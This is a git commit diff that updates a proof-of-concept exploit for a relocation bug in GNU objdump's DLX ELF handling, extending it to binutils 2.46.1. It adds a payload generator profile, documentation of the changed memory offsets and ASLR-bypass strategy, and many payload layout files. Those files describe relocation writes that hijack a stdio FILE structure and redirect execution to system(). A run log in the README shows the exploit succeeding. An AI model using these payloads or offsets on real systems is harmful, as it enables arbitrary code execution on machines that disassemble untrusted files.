Update objdump DLX PoC for binutils 2.46.1

This commit is contained in:
ashton
2026-06-25 06:16:10 -05:00
parent 69f79515e7
commit 9454cb7b48
35 changed files with 344 additions and 3 deletions

View File

@@ -10,6 +10,14 @@ Tested against a binutils-gdb master build from commit:
c311f4d37f31ff3fbb5db6923abcdf93bb75a37b c311f4d37f31ff3fbb5db6923abcdf93bb75a37b
``` ```
Also validated against the official GNU Binutils 2.46.1 release tarball with a
clean `dlx-elf` objdump build:
```text
GNU objdump (GNU Binutils) 2.46.1
elf32-dlx
```
## whats in here ## whats in here
- `payloads/*.bin` - crafted ELF/DLX object files to feed to `objdump` - `payloads/*.bin` - crafted ELF/DLX object files to feed to `objdump`
@@ -27,18 +35,32 @@ The payload files are named `.bin` because they are raw binary files, but the fi
ASLR stays on. Because of that, one exact payload is not guaranteed to land every time. The files in `payloads/` are a small set of guesses for the address layout seen during testing. ASLR stays on. Because of that, one exact payload is not guaranteed to land every time. The files in `payloads/` are a small set of guesses for the address layout seen during testing.
The generator emits the original profile plus a WSL/Ubuntu 24.04 profile measured against the pinned `dlx-elf` build. The second profile keeps ASLR on but uses stable relative offsets observed in the target process: The generator emits the original profile, a WSL/Ubuntu 24.04 profile measured
against the pinned `dlx-elf` build, and a profile measured against a clean GNU
Binutils 2.46.1 `dlx-elf` build. The profiles keep ASLR on but use stable
relative offsets observed in the target process:
```text ```text
layout=wsl2404 off_io=-0x3690 off_sec=0xbb0 rbase=0x220 layout=wsl2404 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
buf_delta=0x702fff00 or 0x6f300000 buf_delta=0x702fff00 or 0x6f300000
system_delta=0x7042e500 or 0x7043e4ff system_delta=0x7042e500 or 0x7043e4ff
layout=gnu2461 off_io=-0x3690 off_sec=0xbb8 rbase=0x190 sec_size_offset=0x40
buf_delta=0x702fff00 or 0x6f300000
system_delta=0x7042e500 or 0x7043e4ff
``` ```
That is an ASLR-on relative-delta strategy, not a universal single-shot info-leak bypass. A miss can still happen, so the runner keeps the retry loop. That is an ASLR-on relative-delta strategy, not a universal single-shot info-leak bypass. A miss can still happen, so the runner keeps the retry loop.
More detail is in `docs/aslr-bypass-analysis.md`. More detail is in `docs/aslr-bypass-analysis.md`.
The `gnu2461` profile was validated with the existing runner:
```text
HIT try=1 payload=.../payloads/dlx_calc_aslr_gnu2461_f05_b702fff00_s7042e500.bin
CALC_HELPER_RAN 2026-06-25T11:14:27Z
```
So a plain crash like this does not always mean the PoC failed: So a plain crash like this does not always mean the PoC failed:
```text ```text

View File

@@ -14,6 +14,8 @@ The current generator emits:
- `orig`: the first measured profile. - `orig`: the first measured profile.
- `wsl2404`: offsets measured against the pinned `dlx-elf` build on - `wsl2404`: offsets measured against the pinned `dlx-elf` build on
WSL/Ubuntu 24.04. WSL/Ubuntu 24.04.
- `gnu2461`: offsets measured against a clean GNU Binutils 2.46.1 `dlx-elf`
objdump build.
The `wsl2404` profile uses: The `wsl2404` profile uses:
@@ -25,6 +27,22 @@ buf_delta=0x702fff00 or 0x6f300000
system_delta=0x7042e500 or 0x7043e4ff system_delta=0x7042e500 or 0x7043e4ff
``` ```
The `gnu2461` profile uses:
```text
off_io=-0x3690
off_sec=0xbb8
sec_size_offset=0x40
rbase=0x190
buf_delta=0x702fff00 or 0x6f300000
system_delta=0x7042e500 or 0x7043e4ff
```
The 2.46.1 profile differs because the relocation cache array moved from
`data+0x220` to `data+0x190`, the BFD section object moved from `data+0xbb0`
to `data+0xbb8`, and the `bfd_section.size` field used to widen generic
relocation range checks is at section offset `0x40`.
## Why argv two-stage is not enough ## Why argv two-stage is not enough
A deterministic leak-then-exploit route would need this sequence in one A deterministic leak-then-exploit route would need this sequence in one

View File

@@ -36,6 +36,7 @@ LAYOUTS = (
"name": "orig", "name": "orig",
"off_io": OFF_IO, "off_io": OFF_IO,
"off_sec": OFF_SEC, "off_sec": OFF_SEC,
"sec_size_offset": 0x38,
"rbase": RBASE, "rbase": RBASE,
"buf_deltas": BUF_TO_FILE_BE32_DELTAS, "buf_deltas": BUF_TO_FILE_BE32_DELTAS,
"wide_deltas": WIDE_TO_FAKE_BE32_DELTAS, "wide_deltas": WIDE_TO_FAKE_BE32_DELTAS,
@@ -45,11 +46,22 @@ LAYOUTS = (
"name": "wsl2404", "name": "wsl2404",
"off_io": -0x3690, "off_io": -0x3690,
"off_sec": 0xBB0, "off_sec": 0xBB0,
"sec_size_offset": 0x38,
"rbase": 0x220, "rbase": 0x220,
"buf_deltas": (0x702FFF00, 0x6F300000), "buf_deltas": (0x702FFF00, 0x6F300000),
"wide_deltas": WIDE_TO_FAKE_BE32_DELTAS, "wide_deltas": WIDE_TO_FAKE_BE32_DELTAS,
"system_deltas": STDERR_TO_SYSTEM_BE32_DELTAS, "system_deltas": STDERR_TO_SYSTEM_BE32_DELTAS,
}, },
{
"name": "gnu2461",
"off_io": -0x3690,
"off_sec": 0xBB8,
"sec_size_offset": 0x40,
"rbase": 0x190,
"buf_deltas": (0x702FFF00, 0x6F300000),
"wide_deltas": WIDE_TO_FAKE_BE32_DELTAS,
"system_deltas": STDERR_TO_SYSTEM_BE32_DELTAS,
},
) )
@@ -85,8 +97,8 @@ def build(out_dir):
file_system_slot = off_io + 0x68 file_system_slot = off_io + 0x68
file_wide_data = off_io + 0xA0 file_wide_data = off_io + 0xA0
file_vtable = off_io + 0xD8 file_vtable = off_io + 0xD8
section_size_low = off_sec + 0x38 section_size_low = off_sec + layout["sec_size_offset"]
section_size_high = off_sec + 0x3C section_size_high = section_size_low + 4
for flag_byte4 in (0x05, 0x06): for flag_byte4 in (0x05, 0x06):
for buf_delta in layout["buf_deltas"]: for buf_delta in layout["buf_deltas"]:
@@ -131,6 +143,7 @@ def build(out_dir):
f"system_delta=0x{system_delta:08x}", f"system_delta=0x{system_delta:08x}",
"command=P", "command=P",
f"off_io={off_io:#x} off_sec={off_sec:#x} rbase={rbase:#x}", f"off_io={off_io:#x} off_sec={off_sec:#x} rbase={rbase:#x}",
f"sec_size_offset={layout['sec_size_offset']:#x}",
"", "",
] ]
+ [ + [

View File

@@ -0,0 +1,34 @@
layout=gnu2461
flag_byte4=0x05
buf_delta=0x6f300000
wide_delta=0x4fff0000
system_delta=0x7042e500
command=P
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
sec_size_offset=0x40
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
024 target=0x0 sym=0x00000000 pad R_DLX_NONE

View File

@@ -0,0 +1,34 @@
layout=gnu2461
flag_byte4=0x05
buf_delta=0x6f300000
wide_delta=0x4fff0000
system_delta=0x7043e4ff
command=P
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
sec_size_offset=0x40
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
024 target=0x0 sym=0x00000000 pad R_DLX_NONE

View File

@@ -0,0 +1,34 @@
layout=gnu2461
flag_byte4=0x05
buf_delta=0x702fff00
wide_delta=0x4fff0000
system_delta=0x7042e500
command=P
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
sec_size_offset=0x40
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
024 target=0x0 sym=0x00000000 pad R_DLX_NONE

View File

@@ -0,0 +1,34 @@
layout=gnu2461
flag_byte4=0x05
buf_delta=0x702fff00
wide_delta=0x4fff0000
system_delta=0x7043e4ff
command=P
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
sec_size_offset=0x40
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
024 target=0x0 sym=0x00000000 pad R_DLX_NONE

View File

@@ -0,0 +1,34 @@
layout=gnu2461
flag_byte4=0x06
buf_delta=0x6f300000
wide_delta=0x4fff0000
system_delta=0x7042e500
command=P
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
sec_size_offset=0x40
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
024 target=0x0 sym=0x00000000 pad R_DLX_NONE

View File

@@ -0,0 +1,34 @@
layout=gnu2461
flag_byte4=0x06
buf_delta=0x6f300000
wide_delta=0x4fff0000
system_delta=0x7043e4ff
command=P
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
sec_size_offset=0x40
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
012 target=-0x3670 sym=0x6f300000 FILE+0x20 input buffer pointer -> FILE fake wide vtable
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
024 target=0x0 sym=0x00000000 pad R_DLX_NONE

View File

@@ -0,0 +1,34 @@
layout=gnu2461
flag_byte4=0x06
buf_delta=0x702fff00
wide_delta=0x4fff0000
system_delta=0x7042e500
command=P
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
sec_size_offset=0x40
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
015 target=-0x3628 sym=0x7042e500 FILE+0x68 _IO_2_1_stderr_ -> system
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
024 target=0x0 sym=0x00000000 pad R_DLX_NONE

View File

@@ -0,0 +1,34 @@
layout=gnu2461
flag_byte4=0x06
buf_delta=0x702fff00
wide_delta=0x4fff0000
system_delta=0x7043e4ff
command=P
off_io=-0x3690 off_sec=0xbb8 rbase=0x190
sec_size_offset=0x40
000 target=0x1db sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x1dc sym=0x000000ff patch reloc2 address high dword byte 3
002 target=-0x3691 sym=0x00d824ad stage write bytes at -0x3690
003 target=0x23b sym=0x00ffffff patch reloc5 address high dword bytes 0..2
004 target=0x23c sym=0x000000ff patch reloc5 address high dword byte 3
005 target=-0x3690 sym=0x000000fb finish write bytes at -0x3690
006 target=0xbf7 sym=0x00ffffff stage write bytes at 0xbf8
007 target=0xbf8 sym=0x000000ff finish write bytes at 0xbf8
008 target=0xbfb sym=0x00ffffff stage write bytes at 0xbfc
009 target=0xbfc sym=0x000000ff finish write bytes at 0xbfc
010 target=0x31b sym=0x00ffffff patch reloc12 address high dword bytes 0..2
011 target=0x31c sym=0x000000ff patch reloc12 address high dword byte 3
012 target=-0x3670 sym=0x702fff00 FILE+0x20 input buffer pointer -> FILE fake wide vtable
013 target=0x37b sym=0x00ffffff patch reloc15 address high dword bytes 0..2
014 target=0x37c sym=0x000000ff patch reloc15 address high dword byte 3
015 target=-0x3628 sym=0x7043e4ff FILE+0x68 _IO_2_1_stderr_ -> system
016 target=0x3db sym=0x00ffffff patch reloc18 address high dword bytes 0..2
017 target=0x3dc sym=0x000000ff patch reloc18 address high dword byte 3
018 target=-0x35f0 sym=0x4fff0000 FILE+0xa0 real wide_data -> FILE-0xc0 fake wide_data
019 target=0x43b sym=0x00ffffff patch reloc21 address high dword bytes 0..2
020 target=0x43c sym=0x000000ff patch reloc21 address high dword byte 3
021 target=-0x35b8 sym=0x00000002 FILE+0xd8 _IO_file_jumps -> interior vtable with finish=_IO_wfile_overflow
022 target=0x0 sym=0x00000000 pad R_DLX_NONE
023 target=0x0 sym=0x00000000 pad R_DLX_NONE
024 target=0x0 sym=0x00000000 pad R_DLX_NONE

View File

@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7042e500 system_delta=0x7042e500
command=P command=P
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
sec_size_offset=0x38
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3

View File

@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7043e4ff system_delta=0x7043e4ff
command=P command=P
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
sec_size_offset=0x38
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3

View File

@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7042e500 system_delta=0x7042e500
command=P command=P
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
sec_size_offset=0x38
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3

View File

@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7043e4ff system_delta=0x7043e4ff
command=P command=P
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
sec_size_offset=0x38
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3

View File

@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7042e500 system_delta=0x7042e500
command=P command=P
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
sec_size_offset=0x38
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3

View File

@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7043e4ff system_delta=0x7043e4ff
command=P command=P
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
sec_size_offset=0x38
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3

View File

@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7042e500 system_delta=0x7042e500
command=P command=P
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
sec_size_offset=0x38
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3

View File

@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7043e4ff system_delta=0x7043e4ff
command=P command=P
off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0 off_io=-0x46a0 off_sec=0xb20 rbase=0x1f0
sec_size_offset=0x38
000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x23b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x23c sym=0x000000ff patch reloc2 address high dword byte 3

View File

@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7042e500 system_delta=0x7042e500
command=P command=P
off_io=-0x3690 off_sec=0xbb0 rbase=0x220 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
sec_size_offset=0x38
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3

View File

@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7043e4ff system_delta=0x7043e4ff
command=P command=P
off_io=-0x3690 off_sec=0xbb0 rbase=0x220 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
sec_size_offset=0x38
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3

View File

@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7042e500 system_delta=0x7042e500
command=P command=P
off_io=-0x3690 off_sec=0xbb0 rbase=0x220 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
sec_size_offset=0x38
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3

View File

@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7043e4ff system_delta=0x7043e4ff
command=P command=P
off_io=-0x3690 off_sec=0xbb0 rbase=0x220 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
sec_size_offset=0x38
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3

View File

@@ -5,6 +5,7 @@ wide_delta=0x4fff0000
system_delta=0x7042e500 system_delta=0x7042e500
command=P command=P
off_io=-0x3690 off_sec=0xbb0 rbase=0x220 off_io=-0x3690 off_sec=0xbb0 rbase=0x220
sec_size_offset=0x38
000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2 000 target=0x26b sym=0x00ffffff patch reloc2 address high dword bytes 0..2
001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3 001 target=0x26c sym=0x000000ff patch reloc2 address high dword byte 3

View File

